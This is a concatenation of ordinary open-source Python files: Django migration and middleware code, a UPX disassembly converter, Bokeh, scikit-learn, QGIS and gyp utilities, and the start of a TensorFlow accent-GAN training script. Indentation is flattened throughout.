'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.citation': {
'contributor_role': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 256027)'}),
'distinct_months': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'first_commit_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_due_to_duplicate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'languages': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'old_summary': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'portfolio_entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.PortfolioEntry']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.dataimportattempt': {
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 74559)'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.link_person_tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_project_tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_projectexp_tag': {
'Meta': {'unique_together': "[('tag', 'project_exp', 'source')]"},
'favorite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project_exp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.ProjectExp']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person', 'project')]"},
'date_collected': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"})
},
'profile.person': {
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']"}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interested_in_working_on': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.portfolioentry': {
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 616868)'}),
'experience_description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'project_description': ('django.db.models.fields.TextField', [], {})
},
'profile.projectexp': {
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'man_months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'modified': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']", 'null': 'True'}),
'person_role': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'primary_language': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'should_show_this': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)"},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'profile.sourceforgeperson': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.sourceforgeproject': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'profile.tagtype': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'prefix': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'search.project': {
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
}
}
complete_apps = ['profile']
|
null--/graviton
|
refs/heads/master
|
code/external/upx/src/stub/src/arch/i086/wdis2gas.py
|
1
|
#! /usr/bin/env python
## vim:set ts=4 sw=4 et: -*- coding: utf-8 -*-
#
# wdis2gas.py --
#
# This file is part of the UPX executable compressor.
#
# Copyright (C) 1996-2013 Markus Franz Xaver Johannes Oberhumer
# All Rights Reserved.
#
# UPX and the UCL library are free software; you can redistribute them
# and/or modify them under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING.
# If not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Markus F.X.J. Oberhumer Laszlo Molnar
# <markus@oberhumer.com> <ml1050@users.sourceforge.net>
#
import getopt, os, re, string, sys
class opts:
arch = "i086"
label_prefix = ".L"
verbose = 0
# /***********************************************************************
# // main
# ************************************************************************/
def main(argv):
shortopts, longopts = "qv", [
"arch", "label-prefix=", "quiet", "verbose"
]
xopts, args = getopt.gnu_getopt(argv[1:], shortopts, longopts)
for opt, optarg in xopts:
if 0: pass
elif opt in ["-q", "--quiet"]: opts.verbose = opts.verbose - 1
elif opt in ["-v", "--verbose"]: opts.verbose = opts.verbose + 1
elif opt in ["--arch"]: opts.arch = optarg
elif opt in ["--label-prefix"]: opts.label_prefix = optarg
else: assert 0, ("getopt problem:", opt, optarg, xopts, args)
#
assert len(args) == 2
ifile = args[0]
ofile = args[1]
# read ifile
lines = open(ifile, "rb").readlines()
lines = map(string.rstrip, lines)
#
section = None
func = None
olines = []
for i in range(len(lines)):
l = lines[i]
if not l: continue
m = re.search(r"^No disassembly errors", l)
if m: continue
m = re.search(r"^Module:", l)
if m: continue
m = re.search(r"^GROUP:", l)
if m: continue
m = re.search(r"^(BSS|Routine) Size:", l)
if m: continue
m = re.search(r"^Segment:\s+(.+)\s+([0-9a-fA-F]+)\s+bytes$", l)
if m:
s = re.split(r"\s+", m.group(1))
assert len(s) == 3, (i, l, s, m.groups())
section = s
func = None
continue
m = re.search(r"^Comdat:\s+(.+)\s+SEGMENT NONE '(\w+)'\s+([0-9a-fA-F]+)\s+bytes$", l)
if m:
section = [m.group(2)]
assert section[0].endswith("_TEXT"), (i, l, section)
func = re.sub(r"^[_@]+|[_@]+$", "", m.group(1))
olines.append(".section .text." + func)
continue
assert section, (i, l)
m = re.search(r"^0000\s+(\w+):$", l)
if m:
assert section[0].endswith("_TEXT"), (i, l, section)
func = re.sub(r"^[_@]+|[_@]+$", "", m.group(1))
olines.append(".section .text." + func)
continue
assert func, (i, l, section)
m = re.search(r"^[0-9a-fA-F]{4}\s+L\$(\d+):$", l)
if m:
olines.append(opts.label_prefix + m.group(1) + ":")
continue
m = re.search(r"^[0-9a-fA-F]{4} (([0-9a-fA-F]{2} )+)\s+(.+)$", l)
assert m, (i, l)
if m.group(3).startswith("call"):
s = re.split(r"\s+", m.group(3))
assert len(s) == 2, (i, l, s, m.groups())
f = re.sub(r"^[@]+|[@]+$", "", s[1])
olines.append(" call " + f)
elif 1:
s = m.group(3).strip()
s = re.sub(r"L\$(\d+)", opts.label_prefix + r"\g<1>", s)
olines.append(" " + s)
else:
s = re.split(r"\s+", m.group(1).strip())
assert 1 <= len(s) <= 5, (i, l, s, m.groups())
s = ["0x" + x for x in s]
olines.append(" .byte " + ",".join(s))
# write ofile
ofp = open(ofile, "wb")
ofp.write(".code16\n")
ofp.write(".intel_syntax noprefix\n")
if opts.arch in ["i086", "8086", "i8086"]:
ofp.write(".arch i8086, jumps\n")
elif opts.arch in ["i286"]:
ofp.write(".arch i286, jumps\n")
else:
assert 0, ("invalid arch", opts.arch)
if 0:
for sym in ["__AHSHIFT", "__AHINCR", "__LMUL", "__aNahdiff"]:
ofp.write(".extern %s\n" % (sym))
ofp.write(".type %s,@function\n" % (sym))
ofp.write(".size %s,2\n" % (sym))
for l in olines:
ofp.write(l.rstrip() + "\n")
ofp.close()
##print olines
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
quasiben/bokeh
|
refs/heads/master
|
bokeh/server/exceptions.py
|
17
|
''' Provide named exceptions having to do with Bokeh Server operation.
'''
from __future__ import absolute_import
class MessageError(Exception):
''' Indicate an error in constructing a Bokeh Message object.
'''
pass
class ProtocolError(Exception):
''' Indicate an error in processing wire protocol fragments.
'''
pass
class ValidationError(Exception):
''' Indicate an error validating wire protocol fragments.
'''
pass
|
LethusTI/supportcenter
|
refs/heads/master
|
vendor/django/django/contrib/staticfiles/views.py
|
98
|
"""
Views and functions for serving static files. These are only to be used during
development, and SHOULD NOT be used in a production setting.
"""
import os
import posixpath
import urllib
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404
from django.views import static
from django.contrib.staticfiles import finders
def serve(request, path, document_root=None, insecure=False, **kwargs):
"""
Serve static files below a given point in the directory structure or
from locations inferred from the staticfiles finders.
To use, put a URL pattern such as::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve')
in your URLconf.
It uses the django.views.static view to serve the found files.
"""
if not settings.DEBUG and not insecure:
raise ImproperlyConfigured("The staticfiles view can only be used in "
"debug mode or if the the --insecure "
"option of 'runserver' is used")
normalized_path = posixpath.normpath(urllib.unquote(path)).lstrip('/')
absolute_path = finders.find(normalized_path)
if not absolute_path:
if path.endswith('/') or path == '':
raise Http404("Directory indexes are not allowed here.")
raise Http404("'%s' could not be found" % path)
document_root, path = os.path.split(absolute_path)
return static.serve(request, path, document_root=document_root, **kwargs)
|
akionakamura/scikit-learn
|
refs/heads/master
|
examples/model_selection/randomized_search.py
|
201
|
"""
=========================================================================
Comparing randomized search and grid search for hyperparameter estimation
=========================================================================
Compare randomized search and grid search for optimizing hyperparameters of a
random forest.
All parameters that influence the learning are searched simultaneously
(except for the number of estimators, which poses a time / quality tradeoff).
The randomized search and the grid search explore exactly the same space of
parameters. The result in parameter settings is quite similar, while the run
time for randomized search is drastically lower.
The performance is slightly worse for the randomized search, though this
is most likely a noise effect and would not carry over to a held-out test set.
Note that in practice, one would not search over this many different parameters
simultaneously using grid search, but pick only the ones deemed most important.
"""
print(__doc__)
import numpy as np
from time import time
from operator import itemgetter
from scipy.stats import randint as sp_randint
from sklearn.grid_search import GridSearchCV, RandomizedSearchCV
from sklearn.datasets import load_digits
from sklearn.ensemble import RandomForestClassifier
# get some data
digits = load_digits()
X, y = digits.data, digits.target
# build a classifier
clf = RandomForestClassifier(n_estimators=20)
# Utility function to report best scores
def report(grid_scores, n_top=3):
top_scores = sorted(grid_scores, key=itemgetter(1), reverse=True)[:n_top]
for i, score in enumerate(top_scores):
print("Model with rank: {0}".format(i + 1))
print("Mean validation score: {0:.3f} (std: {1:.3f})".format(
score.mean_validation_score,
np.std(score.cv_validation_scores)))
print("Parameters: {0}".format(score.parameters))
print("")
# specify parameters and distributions to sample from
param_dist = {"max_depth": [3, None],
"max_features": sp_randint(1, 11),
"min_samples_split": sp_randint(1, 11),
"min_samples_leaf": sp_randint(1, 11),
"bootstrap": [True, False],
"criterion": ["gini", "entropy"]}
# run randomized search
n_iter_search = 20
random_search = RandomizedSearchCV(clf, param_distributions=param_dist,
n_iter=n_iter_search)
start = time()
random_search.fit(X, y)
print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time() - start), n_iter_search))
report(random_search.grid_scores_)
# use a full grid over all parameters
param_grid = {"max_depth": [3, None],
"max_features": [1, 3, 10],
"min_samples_split": [1, 3, 10],
"min_samples_leaf": [1, 3, 10],
"bootstrap": [True, False],
"criterion": ["gini", "entropy"]}
# run grid search
grid_search = GridSearchCV(clf, param_grid=param_grid)
start = time()
grid_search.fit(X, y)
print("GridSearchCV took %.2f seconds for %d candidate parameter settings."
% (time() - start, len(grid_search.grid_scores_)))
report(grid_search.grid_scores_)
|
pavlova-marina/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/qgis/FieldsCalculator.py
|
4
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
FieldsCalculator.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsExpression, QgsFeature, QgsField, QgsDistanceArea, QgsProject, GEO_NONE
from qgis.utils import iface
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector, system
from ui.FieldsCalculatorDialog import FieldsCalculatorDialog
class FieldsCalculator(GeoAlgorithm):
INPUT_LAYER = 'INPUT_LAYER'
NEW_FIELD = 'NEW_FIELD'
FIELD_NAME = 'FIELD_NAME'
FIELD_TYPE = 'FIELD_TYPE'
FIELD_LENGTH = 'FIELD_LENGTH'
FIELD_PRECISION = 'FIELD_PRECISION'
FORMULA = 'FORMULA'
OUTPUT_LAYER = 'OUTPUT_LAYER'
TYPE_NAMES = ['Float', 'Integer', 'String', 'Date']
TYPES = [QVariant.Double, QVariant.Int, QVariant.String, QVariant.Date]
def defineCharacteristics(self):
self.name = 'Field calculator'
self.group = 'Vector table tools'
self.addParameter(ParameterVector(self.INPUT_LAYER,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY], False))
self.addParameter(ParameterString(self.FIELD_NAME,
self.tr('Result field name')))
self.addParameter(ParameterSelection(self.FIELD_TYPE,
self.tr('Field type'), self.TYPE_NAMES))
self.addParameter(ParameterNumber(self.FIELD_LENGTH,
self.tr('Field length'), 1, 255, 10))
self.addParameter(ParameterNumber(self.FIELD_PRECISION,
self.tr('Field precision'), 0, 15, 3))
self.addParameter(ParameterBoolean(self.NEW_FIELD,
self.tr('Create new field'), True))
self.addParameter(ParameterString(self.FORMULA, self.tr('Formula')))
self.addOutput(OutputVector(self.OUTPUT_LAYER, self.tr('Output layer')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.INPUT_LAYER))
fieldName = self.getParameterValue(self.FIELD_NAME)
fieldType = self.TYPES[self.getParameterValue(self.FIELD_TYPE)]
width = self.getParameterValue(self.FIELD_LENGTH)
precision = self.getParameterValue(self.FIELD_PRECISION)
newField = self.getParameterValue(self.NEW_FIELD)
formula = self.getParameterValue(self.FORMULA)
output = self.getOutputFromName(self.OUTPUT_LAYER)
if output.value == '':
ext = output.getDefaultFileExtension(self)
output.value = system.getTempFilenameInTempFolder(
output.name + '.' + ext)
provider = layer.dataProvider()
fields = layer.pendingFields()
if newField:
fields.append(QgsField(fieldName, fieldType, '', width, precision))
writer = output.getVectorWriter(fields, provider.geometryType(),
layer.crs())
exp = QgsExpression(formula)
da = QgsDistanceArea()
da.setSourceCrs(layer.crs().srsid())
da.setEllipsoidalMode(
iface.mapCanvas().mapSettings().hasCrsTransformEnabled())
da.setEllipsoid(QgsProject.instance().readEntry(
'Measure', '/Ellipsoid', GEO_NONE)[0])
exp.setGeomCalculator(da)
if not exp.prepare(layer.pendingFields()):
raise GeoAlgorithmExecutionException(
self.tr('Evaluation error: %s' % exp.evalErrorString()))
outFeature = QgsFeature()
outFeature.initAttributes(len(fields))
outFeature.setFields(fields)
error = ''
calculationSuccess = True
current = 0
features = vector.features(layer)
total = 100.0 / len(features)
rownum = 1
for current, f in enumerate(features):
rownum = current + 1
exp.setCurrentRowNumber(rownum)
value = exp.evaluate(f)
if exp.hasEvalError():
calculationSuccess = False
error = exp.evalErrorString()
break
else:
outFeature.setGeometry(f.geometry())
for fld in f.fields():
outFeature[fld.name()] = f[fld.name()]
outFeature[fieldName] = value
writer.addFeature(outFeature)
progress.setPercentage(int(current * total))
del writer
if not calculationSuccess:
raise GeoAlgorithmExecutionException(
            self.tr('An error occurred while evaluating the calculation '
'string:\n%s' % error))
def checkParameterValuesBeforeExecuting(self):
newField = self.getParameterValue(self.NEW_FIELD)
fieldName = self.getParameterValue(self.FIELD_NAME)
if newField and len(fieldName) == 0:
raise GeoAlgorithmExecutionException(
self.tr('Field name is not set. Please enter a field name'))
outputName = self.getOutputValue(self.OUTPUT_LAYER)
if outputName == '':
raise GeoAlgorithmExecutionException(
                self.tr('Output is not set. Please specify a valid filename'))
def getCustomParametersDialog(self):
return FieldsCalculatorDialog(self)
|
illicitonion/givabit
|
refs/heads/master
|
lib/sdks/google_appengine_1.7.1/google_appengine/lib/django_0_96/django/middleware/transaction.py
|
447
|
from django.db import transaction
class TransactionMiddleware(object):
"""
    Transaction middleware. If this is enabled, each view function will be run
    inside a managed transaction - that way a save() doesn't do a direct
    commit; the commit is done when a successful response is created. If an
    exception happens, the database is rolled back.
"""
def process_request(self, request):
"""Enters transaction management"""
transaction.enter_transaction_management()
transaction.managed(True)
def process_exception(self, request, exception):
"""Rolls back the database and leaves transaction management"""
if transaction.is_dirty():
transaction.rollback()
transaction.leave_transaction_management()
def process_response(self, request, response):
"""Commits and leaves transaction management."""
if transaction.is_managed():
if transaction.is_dirty():
transaction.commit()
transaction.leave_transaction_management()
return response
|
pandaxcl/gyp
|
refs/heads/master
|
test/win/linker-flags/update_pgd.py
|
106
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from optparse import OptionParser
import glob
import os
import subprocess
parser = OptionParser()
parser.add_option('--exe', dest='exe')
parser.add_option('--vcbindir', dest='vcbindir')
parser.add_option('--pgd', dest='pgd')
(options, args) = parser.parse_args()
# Instrumented binaries fail to run unless Visual C++'s bin dir is included
# in the PATH environment variable.
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + options.vcbindir
# Run Instrumented binary. The profile will be recorded into *.pgc file.
subprocess.call([options.exe])
# Merge *.pgc files into a *.pgd (Profile-Guided Database) file.
subprocess.call(['pgomgr', '/merge', options.pgd])
# *.pgc files are no longer necessary. Clear all of them.
pgd_file = os.path.abspath(options.pgd)
pgd_dir = os.path.dirname(pgd_file)
(pgd_basename, _) = os.path.splitext(os.path.basename(pgd_file))
pgc_filepattern = os.path.join(pgd_dir, '%s!*.pgc' % pgd_basename)
pgc_files = glob.glob(pgc_filepattern)
for pgc_file in pgc_files:
os.unlink(pgc_file)
|
csuttles/utils
|
refs/heads/master
|
python/todo-api/flask/lib/python2.7/site-packages/pkg_resources/_vendor/packaging/_compat.py
|
901
|
# Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
# flake8: noqa
if PY3:
string_types = str,
else:
string_types = basestring,
def with_metaclass(meta, *bases):
"""
Create a base class with a metaclass.
"""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
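# Minimal usage sketch (illustrative only, not part of the vendored module):
# with_metaclass lets a class body pick up a metaclass in a way that works on
# both Python 2 and Python 3. The metaclass and class names below are made up
# for demonstration purposes.
if __name__ == "__main__":
    class UpperNameMeta(type):
        # Example metaclass that records the uppercased class name.
        def __new__(mcls, name, bases, namespace):
            cls = super(UpperNameMeta, mcls).__new__(mcls, name, bases, namespace)
            cls.upper_name = name.upper()
            return cls

    class Example(with_metaclass(UpperNameMeta, object)):
        pass

    print(Example.upper_name)  # -> 'EXAMPLE'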
|
accentgan/iclr2018
|
refs/heads/master
|
main.py
|
1
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
from model import SEGAN, SEAE
from gru_model import GRUGAN
from ddpg_model import DDPGGAN
import os
from tensorflow.python.client import device_lib
from scipy.io import wavfile
from data_loader import pre_emph
devices = device_lib.list_local_devices()
flags = tf.app.flags
flags.DEFINE_integer("seed",111, "Random seed (Def: 111).")
flags.DEFINE_integer("epoch", 150, "Epochs to train (Def: 150).")
flags.DEFINE_integer("batch_size", 150, "Batch size (Def: 150).")
flags.DEFINE_integer("save_freq", 1000, "Batch save freq (Def: 50).")
flags.DEFINE_integer("canvas_size", 2**13, "Canvas size (Def: 2^14).")
flags.DEFINE_integer("denoise_epoch", 5, "Epoch where noise in disc is "
"removed (Def: 5).")
flags.DEFINE_integer("l1_remove_epoch", 150, "Epoch where L1 in G is "
"removed (Def: 150).")
flags.DEFINE_boolean("bias_deconv", True,
"Flag to specify if we bias deconvs (Def: False)")
flags.DEFINE_boolean("bias_downconv", True,
"flag to specify if we bias downconvs (def: false)")
flags.DEFINE_boolean("bias_D_conv", True,
"flag to specify if we bias D_convs (def: false)")
# TODO: noise decay is under check
flags.DEFINE_float("denoise_lbound", 0.01, "Min noise std to be still alive (Def: 0.001)")
flags.DEFINE_float("noise_decay", 0.7, "Decay rate of noise std (Def: 0.7)")
flags.DEFINE_float("d_label_smooth", 0.25, "Smooth factor in D (Def: 0.25)")
flags.DEFINE_float("init_noise_std", 0.5, "Init noise std (Def: 0.5)")
flags.DEFINE_float("init_l1_weight", 100., "Init L1 lambda (Def: 100)")
flags.DEFINE_integer("z_dim", 256, "Dimension of input noise to G (Def: 256).")
flags.DEFINE_integer("z_depth", 256, "Depth of input noise to G (Def: 256).")
flags.DEFINE_string("save_path", "segan_results", "Path to save out model "
"files. (Def: dwavegan_model"
").")
flags.DEFINE_string("g_nl", "leaky", "Type of nonlinearity in G: leaky or prelu. (Def: leaky).")
flags.DEFINE_string("model", "gan", "Type of model to train: gan or ae. (Def: gan).")
flags.DEFINE_string("deconv_type", "deconv", "Type of deconv method: deconv or "
"nn_deconv (Def: deconv).")
flags.DEFINE_string("g_type", "ae", "Type of G to use: ae or dwave. (Def: ae).")
flags.DEFINE_float("g_learning_rate", 0.0002, "G learning_rate (Def: 0.0002)")
flags.DEFINE_float("d_learning_rate", 0.0002, "D learning_rate (Def: 0.0002)")
flags.DEFINE_float("beta_1", 0.5, "Adam beta 1 (Def: 0.5)")
flags.DEFINE_float("preemph", 0.95, "Pre-emph factor (Def: 0.95)")
flags.DEFINE_string("synthesis_path", "dwavegan_samples", "Path to save output"
" generated samples."
" (Def: dwavegan_sam"
"ples).")
flags.DEFINE_string("e2e_dataset", "data/cslu.tfrecords", "TFRecords"
" (Def: data/"
"segan.tfrecords.")
flags.DEFINE_string("save_clean_path", "test_clean_results", "Path to save clean utts")
flags.DEFINE_string("test_wav", None, "name of test wav (it won't train)")
flags.DEFINE_string("weights", None, "Weights file")
flags.DEFINE_integer("accent_class",5,"number of classes of accents")
flags.DEFINE_integer("slice_num",4,"number of recurrent iterations")
flags.DEFINE_float("g_policy_learning_rate", 5e-4, "Learning rate for generator network in policy gradient setting")
flags.DEFINE_boolean("adam",True, "Whether to use Adam for policy gradients")
flags.DEFINE_integer("num_runs",2, "Number of runs for estimating reward function in MC manner")
flags.DEFINE_integer("start_epoch",0,"Starting epoch while training")
flags.DEFINE_integer("sample_rate",8e3,"value of sample rate for speech document")
FLAGS = flags.FLAGS
def pre_emph_test(coeff, canvas_size):
x_ = tf.placeholder(tf.float32, shape=[canvas_size,])
x_preemph = pre_emph(x_, coeff)
return x_, x_preemph
def main(_):
print('Parsed arguments: ', FLAGS.__flags)
# make save path if it is required
if not os.path.exists(FLAGS.save_path):
os.makedirs(FLAGS.save_path)
if not os.path.exists(FLAGS.synthesis_path):
os.makedirs(FLAGS.synthesis_path)
np.random.seed(FLAGS.seed)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement=True
udevices = []
for device in devices:
if len(devices) > 1 and 'cpu' in device.name:
            # Use cpu only when we don't have gpus
continue
